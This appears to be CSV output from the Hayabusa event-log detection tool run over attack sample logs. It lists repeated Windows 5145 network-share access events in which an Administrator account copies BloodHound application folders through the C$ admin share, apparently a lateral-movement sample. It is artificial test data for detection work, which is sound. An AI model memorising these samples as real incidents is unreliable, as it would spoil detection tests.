2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
